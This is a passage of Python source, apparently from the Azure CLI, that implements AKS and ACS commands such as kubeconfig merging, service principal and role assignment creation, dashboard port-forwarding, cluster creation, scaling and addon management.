{} in your kubeconfig file.' 
raise CLIError(msg.format(i['name'], key)) existing[key].append(i) def load_kubernetes_configuration(filename): try: with open(filename) as stream: return yaml.safe_load(stream) except (IOError, OSError) as ex: if getattr(ex, 'errno', 0) == errno.ENOENT: raise CLIError('{} does not exist'.format(filename)) else: raise except (yaml.parser.ParserError, UnicodeDecodeError) as ex: raise CLIError('Error parsing {} ({})'.format(filename, str(ex))) def merge_kubernetes_configurations(existing_file, addition_file, replace): existing = load_kubernetes_configuration(existing_file) addition = load_kubernetes_configuration(addition_file) # rename the admin context so it doesn't overwrite the user context for ctx in addition.get('contexts', []): try: if ctx['context']['user'].startswith('clusterAdmin'): admin_name = ctx['name'] + '-admin' addition['current-context'] = ctx['name'] = admin_name break except (KeyError, TypeError): continue if addition is None: raise CLIError('failed to load additional configuration from {}'.format(addition_file)) if existing is None: existing = addition else: _handle_merge(existing, addition, 'clusters', replace) _handle_merge(existing, addition, 'users', replace) _handle_merge(existing, addition, 'contexts', replace) existing['current-context'] = addition['current-context'] # check that ~/.kube/config is only read- and writable by its owner if platform.system() != 'Windows': existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode)) if not existing_file_perms.endswith('600'): logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.', existing_file, existing_file_perms) with open(existing_file, 'w+') as stream: yaml.safe_dump(existing, stream, default_flow_style=False) current_context = addition.get('current-context', 'UNKNOWN') msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file) print(msg) def _get_host_name(acs_info): """ Gets the FQDN from the acs_info object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info is None: raise CLIError('Missing acs_info') if acs_info.master_profile is None: raise CLIError('Missing master_profile') if acs_info.master_profile.fqdn is None: raise CLIError('Missing fqdn') return acs_info.master_profile.fqdn def _get_username(acs_info): """ Gets the admin user name from the Linux profile of the ContainerService object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info.linux_profile is not None: return acs_info.linux_profile.admin_username return None def _get_acs_info(cli_ctx, name, resource_group_name): """ Gets the ContainerService object from Azure REST API. 
:param name: ACS resource name :type name: String :param resource_group_name: Resource group name :type resource_group_name: String """ container_services = cf_container_services(cli_ctx, None) return container_services.get(resource_group_name, name) def _rand_str(n): """ Gets a random string """ choices = string.ascii_lowercase + string.digits return ''.join(random.SystemRandom().choice(choices) for _ in range(n)) def _mkdir_p(path): # http://stackoverflow.com/a/600612 try: os.makedirs(path) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count): instance = client.get(resource_group_name, container_service_name) instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member # null out the service principal because otherwise validation complains if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes: instance.service_principal_profile = None # null out the windows profile so that validation doesn't complain about not having the admin password instance.windows_profile = None return client.create_or_update(resource_group_name, container_service_name, instance) def list_container_services(cmd, client, resource_group_name=None): ''' List Container Services. ''' svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \ if resource_group_name else client.list() return list(svc_list) def show_service_principal(client, identifier): object_id = _resolve_service_principal(client, identifier) return client.get(object_id) def _resolve_service_principal(client, identifier): # todo: confirm with graph team that a service principal name must be unique result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier))) if result: return result[0].object_id try: uuid.UUID(identifier) return identifier # assume an object id except ValueError: raise CLIError("service principal '{}' doesn't exist".format(identifier)) def create_application(client, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants, display_name=display_name, identifier_uris=identifier_uris, homepage=homepage, reply_urls=reply_urls, key_credentials=key_creds, password_credentials=password_creds, required_resource_access=required_resource_accesses) try: return client.create(app_create_param) except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. 
Original error: {}".format(link, ex)) raise def update_application(client, object_id, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) try: if key_creds: client.update_key_credentials(object_id, key_creds) if password_creds: client.update_password_credentials(object_id, password_creds) if reply_urls: client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls)) return except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. Original error: {}".format(link, ex)) raise def _build_application_creds(password=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None): if password and key_value: raise CLIError('specify either --password or --key-value, but not both.') if not start_date: start_date = datetime.datetime.utcnow() elif isinstance(start_date, str): start_date = dateutil.parser.parse(start_date) if not end_date: end_date = start_date + relativedelta(years=1) elif isinstance(end_date, str): end_date = dateutil.parser.parse(end_date) key_type = key_type or 'AsymmetricX509Cert' key_usage = key_usage or 'Verify' password_creds = None key_creds = None if password: password_creds = [PasswordCredential(start_date=start_date, end_date=end_date, key_id=str(uuid.uuid4()), value=password)] elif key_value: key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value, key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)] return (password_creds, key_creds) def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None): if rbac_client is None: rbac_client = get_graph_rbac_management_client(cli_ctx) if resolve_app: try: uuid.UUID(identifier) result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier))) except ValueError: result = list(rbac_client.applications.list( filter="identifierUris/any(s:s eq '{}')".format(identifier))) if not result: # assume we get an object id result = [rbac_client.applications.get(identifier)] app_id = result[0].app_id else: app_id = identifier return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True)) def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None): return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope) def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True): from azure.cli.core.profiles import ResourceType, get_sdk factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments definitions_client = factory.role_definitions scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id) role_id = _resolve_role_id(role, scope, definitions_client) object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee RoleAssignmentCreateParameters = 
get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION, 'RoleAssignmentCreateParameters', mod='models', operation_group='role_assignments') parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id) assignment_name = uuid.uuid4() custom_headers = None return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers) def _build_role_scope(resource_group_name, scope, subscription_id): subscription_scope = '/subscriptions/' + subscription_id if scope: if resource_group_name: err = 'Resource group "{}" is redundant because scope is supplied' raise CLIError(err.format(resource_group_name)) elif resource_group_name: scope = subscription_scope + '/resourceGroups/' + resource_group_name else: scope = subscription_scope return scope def _resolve_role_id(role, scope, definitions_client): role_id = None try: uuid.UUID(role) role_id = role except ValueError: pass if not role_id: # retrieve role id role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role))) if not role_defs: raise CLIError("Role '{}' doesn't exist.".format(role)) elif len(role_defs) > 1: ids = [r.id for r in role_defs] err = "More than one role matches the given name '{}'. Please pick a value from '{}'" raise CLIError(err.format(role, ids)) role_id = role_defs[0].id return role_id def _resolve_object_id(cli_ctx, assignee): client = get_graph_rbac_management_client(cli_ctx) result = None if assignee.find('@') >= 0: # looks like a user principal name result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee))) if not result: result = list(client.service_principals.list( filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee))) if not result: # assume an object id, let us verify it result = _get_object_stubs(client, [assignee]) # 2+ matches should never happen, so we only check 'no match' here if not result: raise CLIError("No matches in graph database for '{}'".format(assignee)) return result[0].object_id def _get_object_stubs(graph_client, assignees): params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees) return list(graph_client.objects.get_objects_by_object_ids(params)) def _update_dict(dict1, dict2): cp = dict1.copy() cp.update(dict2) return cp def subnet_role_assignment_exists(cli_ctx, scope): network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7" factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'): if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id): return True return False def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_address='127.0.0.1', listen_port='8001'): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port) _, browse_path = tempfile.mkstemp() # TODO: need to add an --admin option? 
    aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
                                     json={"url": result['url']})
        logger.warning('To view the console, please open %s in a new tab', result['url'])
    else:
        logger.warning('Proxy running on %s', proxy_url)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async(proxy_url)
    try:
        try:
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
                                     "port-forward", "--address", listen_address, dashboard_pod,
                                     "{0}:9090".format(listen_port)], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            # bytes.find() returns -1 when the message is absent, which is truthy, so compare
            # explicitly before falling back to the invocation without "--address".
            if err.output.find(b'unknown flag: --address') != -1:
                if listen_address != '127.0.0.1':
                    logger.warning('"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning('The "--listen-address" argument will be ignored.')
                subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
                                 "port-forward", dashboard_pod, "{0}:9090".format(listen_port)])
    except KeyboardInterrupt:
        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        # TODO: Better error handling here.
requests.post('http://localhost:8888/closeport/8001') def _trim_nodepoolname(nodepool_name): if not nodepool_name: return "nodepool1" return nodepool_name[:12] def _validate_ssh_key(no_ssh_key, ssh_key_value): if not no_ssh_key: try: if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value): raise ValueError() except (TypeError, ValueError): shortened_key = truncate_text(ssh_key_value) raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key)) # pylint: disable=too-many-statements def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals dns_name_prefix=None, location=None, admin_username="azureuser", kubernetes_version='', node_vm_size="Standard_DS2_v2", node_osdisk_size=0, node_count=3, nodepool_name="nodepool1", service_principal=None, client_secret=None, no_ssh_key=False, disable_rbac=None, enable_rbac=None, skip_subnet_role_assignment=False, network_plugin=None, network_policy=None, pod_cidr=None, service_cidr=None, dns_service_ip=None, docker_bridge_address=None, enable_addons=None, workspace_resource_id=None, vnet_subnet_id=None, max_pods=0, aad_client_app_id=None, aad_server_app_id=None, aad_server_app_secret=None, aad_tenant_id=None, tags=None, generate_ssh_keys=False, # pylint: disable=unused-argument no_wait=False): _validate_ssh_key(no_ssh_key, ssh_key_value) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location agent_pool_profile = ManagedClusterAgentPoolProfile( name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it count=int(node_count), vm_size=node_vm_size, os_type="Linux", storage_profile=ContainerServiceStorageProfileTypes.managed_disks, vnet_subnet_id=vnet_subnet_id, max_pods=int(max_pods) if max_pods else None ) if node_osdisk_size: agent_pool_profile.os_disk_size_gb = int(node_osdisk_size) linux_profile = None # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified. if not no_ssh_key: ssh_config = ContainerServiceSshConfiguration( public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)]) linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config) principal_obj = _ensure_aks_service_principal(cmd.cli_ctx, service_principal=service_principal, client_secret=client_secret, subscription_id=subscription_id, dns_name_prefix=dns_name_prefix, location=location, name=name) service_principal_profile = ContainerServiceServicePrincipalProfile( client_id=principal_obj.get("service_principal"), secret=principal_obj.get("client_secret"), key_vault_secret_ref=None) if (vnet_subnet_id and not skip_subnet_role_assignment and not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)): scope = vnet_subnet_id if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor', service_principal_profile.client_id, scope=scope): logger.warning('Could not create a role assignment for subnet. 
' 'Are you an Owner on this subscription?') network_profile = None if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address, network_policy]): if not network_plugin: raise CLIError('Please explicitly specify the network plugin type') if pod_cidr and network_plugin == "azure": raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified') network_profile = ContainerServiceNetworkProfile( network_plugin=network_plugin, pod_cidr=pod_cidr, service_cidr=service_cidr, dns_service_ip=dns_service_ip, docker_bridge_cidr=docker_bridge_address, network_policy=network_policy ) addon_profiles = _handle_addons_args( cmd, enable_addons, subscription_id, resource_group_name, {}, workspace_resource_id ) monitoring = False if 'omsagent' in addon_profiles: monitoring = True _ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent']) aad_profile = None if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]): if aad_tenant_id is None: profile = Profile(cli_ctx=cmd.cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() aad_profile = ManagedClusterAADProfile( client_app_id=aad_client_app_id, server_app_id=aad_server_app_id, server_app_secret=aad_server_app_secret, tenant_id=aad_tenant_id ) # Check that both --disable-rbac and --enable-rbac weren't provided if all([disable_rbac, enable_rbac]): raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.') mc = ManagedCluster( location=location, tags=tags, dns_prefix=dns_name_prefix, kubernetes_version=kubernetes_version, enable_rbac=False if disable_rbac else True, agent_pool_profiles=[agent_pool_profile], linux_profile=linux_profile, service_principal_profile=service_principal_profile, network_profile=network_profile, addon_profiles=addon_profiles, aad_profile=aad_profile) # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: result = sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=mc) # add cluster spn with Monitoring Metrics Publisher role assignment to the cluster resource # mdm metrics supported only in azure public cloud so add the role assignment only in this cloud cloud_name = cmd.cli_ctx.cloud.name if cloud_name.lower() == 'azurecloud' and monitoring: from msrestazure.tools import resource_id cluster_resource_id = resource_id( subscription=subscription_id, resource_group=resource_group_name, namespace='Microsoft.ContainerService', type='managedClusters', name=name ) if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher', service_principal_profile.client_id, scope=cluster_resource_id): logger.warning('Could not create a role assignment for monitoring addon. 
' 'Are you an Owner on this subscription?') return result except CloudError as ex: retry_exception = ex if 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) instance = _update_addons( cmd, instance, subscription_id, resource_group_name, addons, enable=False, no_wait=no_wait ) # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None, subnet_name=None, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) service_principal_client_id = instance.service_principal_profile.client_id instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True, workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait) if 'omsagent' in instance.addon_profiles: _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent']) cloud_name = cmd.cli_ctx.cloud.name # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud if cloud_name.lower() == 'azurecloud': from msrestazure.tools import resource_id cluster_resource_id = resource_id( subscription=subscription_id, resource_group=resource_group_name, namespace='Microsoft.ContainerService', type='managedClusters', name=name ) if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher', service_principal_client_id, scope=cluster_resource_id): logger.warning('Could not create a role assignment for Monitoring addon. 
' 'Are you an Owner on this subscription?') # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_get_versions(cmd, client, location): return client.list_orchestrators(location, resource_type='managedClusters') def aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), overwrite_existing=False): credentialResults = None if admin: credentialResults = client.list_cluster_admin_credentials(resource_group_name, name) else: credentialResults = client.list_cluster_user_credentials(resource_group_name, name) if not credentialResults: raise CLIError("No Kubernetes credentials found.") else: try: kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8') _print_or_merge_credentials(path, kubeconfig, overwrite_existing) except (IndexError, ValueError): raise CLIError("Fail to find kubeconfig file.") ADDONS = { 'http_application_routing': 'httpApplicationRouting', 'monitoring': 'omsagent', 'virtual-node': 'aciConnector' } def aks_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_nulls(list(managed_clusters)) def aks_show(cmd, client, resource_group_name, name): mc = client.get(resource_group_name, name) return _remove_nulls([mc])[0] def aks_update_credentials(cmd, client, resource_group_name, name, reset_service_principal=False, reset_aad=False, service_principal=None, client_secret=None, aad_server_app_id=None, aad_server_app_secret=None, aad_client_app_id=None, aad_tenant_id=None, no_wait=False): if bool(reset_service_principal) == bool(reset_aad): raise CLIError('usage error: --reset-service-principal | --reset-aad-profile') if reset_service_principal: if service_principal is None or client_secret is None: raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET') return sdk_no_wait(no_wait, client.reset_service_principal_profile, resource_group_name, name, service_principal, client_secret) if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]): raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID ' '--aad-server-app-secret SECRET [--aad-tenant-id ID]') parameters = { 'clientAppID': aad_client_app_id, 'serverAppID': aad_server_app_id, 'serverAppSecret': aad_server_app_secret, 'tenantID': aad_tenant_id } return sdk_no_wait(no_wait, client.reset_aad_profile, resource_group_name, name, parameters) def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False): instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. 
for agent_profile in instance.agent_pool_profiles: if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1): agent_profile.count = int(node_count) # pylint: disable=no-member # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name)) def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument instance = client.get(resource_group_name, name) if instance.kubernetes_version == kubernetes_version: if instance.provisioning_state == "Succeeded": logger.warning("The cluster is already on version %s and is not in a failed state. No operations " "will occur when upgrading to the same version if the cluster is not in a failed state.", instance.kubernetes_version) elif instance.provisioning_state == "Failed": logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to " "attempt resolution of failed cluster state.", instance.kubernetes_version) instance.kubernetes_version = kubernetes_version # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) DEV_SPACES_EXTENSION_NAME = 'dev-spaces' DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom' def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False): """ Use Azure Dev Spaces with a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param update: Update to the latest Azure Dev Spaces client components. :type update: bool :param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience. :type space_name: String :param prompt: Do not prompt for confirmation. Requires --space. :type prompt: bool """ if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt) except TypeError: raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.") except AttributeError as ae: raise CLIError(ae) def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False): """ Remove Azure Dev Spaces from a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param prompt: Do not prompt for confirmation. 
:type prompt: bool """ if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt) except AttributeError as ae: raise CLIError(ae) def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None, subnet_name=None, no_wait=False): # parse the comma-separated addons argument addon_args = addons.split(',') addon_profiles = instance.addon_profiles or {} os_type = 'Linux' # for each addons argument for addon_arg in addon_args: addon = ADDONS[addon_arg] if addon == 'aciConnector': # only linux is supported for now, in the future this will be a user flag addon += os_type # addon name is case insensitive addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon) if enable: # add new addons or update existing ones and enable them addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False)) # special config handling for certain addons if addon == 'omsagent': if addon_profile.enabled: raise CLIError('The monitoring addon is already enabled for this managed cluster.\n' 'To change monitoring configuration, run "az aks disable-addons -a monitoring"' 'before enabling it again.') if not workspace_resource_id: workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id} elif addon.lower() == ('aciConnector' + os_type).lower(): if addon_profile.enabled: raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n' 'To change virtual-node configuration, run ' '"az aks disable-addons -a virtual-node -g {resource_group_name}" ' 'before enabling it again.') if not subnet_name: raise CLIError('The aci-connector addon requires setting a subnet name.') addon_profile.config = {'SubnetName': subnet_name} addon_profiles[addon] = addon_profile else: if addon not in addon_profiles: raise CLIError("The addon {} is not installed.".format(addon)) addon_profiles[addon].config = None addon_profiles[addon].enabled = enable instance.addon_profiles = addon_profiles # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return instance def _get_azext_module(extension_name, module_name): try: # Adding the installed extension in the path from azure.cli.core.extension.operations import add_extension_to_path add_extension_to_path(extension_name) # Import the extension module from importlib import import_module azext_custom = import_module(module_name) return azext_custom except ImportError as ie: raise CLIError(ie) def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None, workspace_resource_id=None): if not addon_profiles: addon_profiles = {} addons = addons_str.split(',') if addons_str else [] if 'http_application_routing' in addons: addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True) addons.remove('http_application_routing') # TODO: can we help the user find a workspace 
resource ID? if 'monitoring' in addons: if not workspace_resource_id: # use default workspace if exists else create default workspace workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profiles['omsagent'] = ManagedClusterAddonProfile( enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id}) addons.remove('monitoring') # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is elif workspace_resource_id: raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".') # error out if any (unrecognized) addons remain if addons: raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format( ",".join(addons), "are" if len(addons) > 1 else "is")) return addon_profiles def _install_dev_spaces_extension(cmd, extension_name): try: from azure.cli.core.extension import operations operations.add_extension(cmd=cmd, extension_name=extension_name) except Exception: # nopa pylint: disable=broad-except return False return True def _update_dev_spaces_extension(cmd, extension_name, extension_module): from azure.cli.core.extension import ExtensionNotInstalledException try: from azure.cli.core.extension import operations operations.update_extension(cmd=cmd, extension_name=extension_name) operations.reload_extension(extension_name=extension_name) except CLIError as err: logger.info(err) except ExtensionNotInstalledException as err: logger.debug(err) return False except ModuleNotFoundError as err: logger.debug(err) logger.error("Error occurred attempting to load the extension module. 
Use --debug for more information.") return False return True def _get_or_add_extension(cmd, extension_name, extension_module, update=False): from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension) try: get_extension(extension_name) if update: return _update_dev_spaces_extension(cmd, extension_name, extension_module) except ExtensionNotInstalledException: return _install_dev_spaces_extension(cmd, extension_name) return True def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name): # mapping for azure public cloud # log analytics workspaces cannot be created in WCUS region due to capacity limits # so mapped to EUS per discussion with log analytics team AzureCloudLocationToOmsRegionCodeMap = { "eastus": "EUS", "westeurope": "WEU", "southeastasia": "SEA", "australiasoutheast": "ASE", "usgovvirginia": "USGV", "westcentralus": "EUS", "japaneast": "EJP", "uksouth": "SUK", "canadacentral": "CCA", "centralindia": "CIN", "eastus2euap": "EAP" } AzureCloudRegionToOmsRegionMap = { "australiaeast": "australiasoutheast", "australiasoutheast": "australiasoutheast", "brazilsouth": "eastus", "canadacentral": "canadacentral", "canadaeast": "canadacentral", "centralus": "eastus", "eastasia": "southeastasia", "eastus": "eastus", "eastus2": "eastus", "japaneast": "japaneast", "japanwest": "japaneast", "northcentralus": "eastus", "northeurope": "westeurope", "southcentralus": "eastus", "southeastasia": "southeastasia", "uksouth": "uksouth", "ukwest": "uksouth", "westcentralus": "eastus", "westeurope": "westeurope", "westus": "eastus", "westus2": "eastus", "centralindia": "centralindia", "southindia": "centralindia", "westindia": "centralindia", "koreacentral": "southeastasia", "koreasouth": "southeastasia", "francecentral": "westeurope", "francesouth": "westeurope" } # mapping for azure china cloud # currently log analytics supported only China East 2 region AzureChinaLocationToOmsRegionCodeMap = { "chinaeast": "EAST2", "chinaeast2": "EAST2", "chinanorth": "EAST2", "chinanorth2": "EAST2" } AzureChinaRegionToOmsRegionMap = { "chinaeast": "chinaeast2", "chinaeast2": "chinaeast2", "chinanorth": "chinaeast2", "chinanorth2": "chinaeast2" } rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) default_region_name = "eastus" default_region_code = "EUS" workspace_region = default_region_name workspace_region_code = default_region_code cloud_name = cmd.cli_ctx.cloud.name if cloud_name.lower() == 'azurecloud': workspace_region = AzureCloudRegionToOmsRegionMap[ rg_location] if AzureCloudRegionToOmsRegionMap[rg_location] else default_region_name workspace_region_code = AzureCloudLocationToOmsRegionCodeMap[ workspace_region] if AzureCloudLocationToOmsRegionCodeMap[workspace_region] else default_region_code elif cloud_name.lower() == 'azurechinacloud': default_region_name = "chinaeast2" default_region_code = "EAST2" workspace_region = AzureChinaRegionToOmsRegionMap[ rg_location] if AzureChinaRegionToOmsRegionMap[rg_location] else default_region_name workspace_region_code = AzureChinaLocationToOmsRegionCodeMap[ workspace_region] if AzureChinaLocationToOmsRegionCodeMap[workspace_region] else default_region_code else: logger.error("AKS 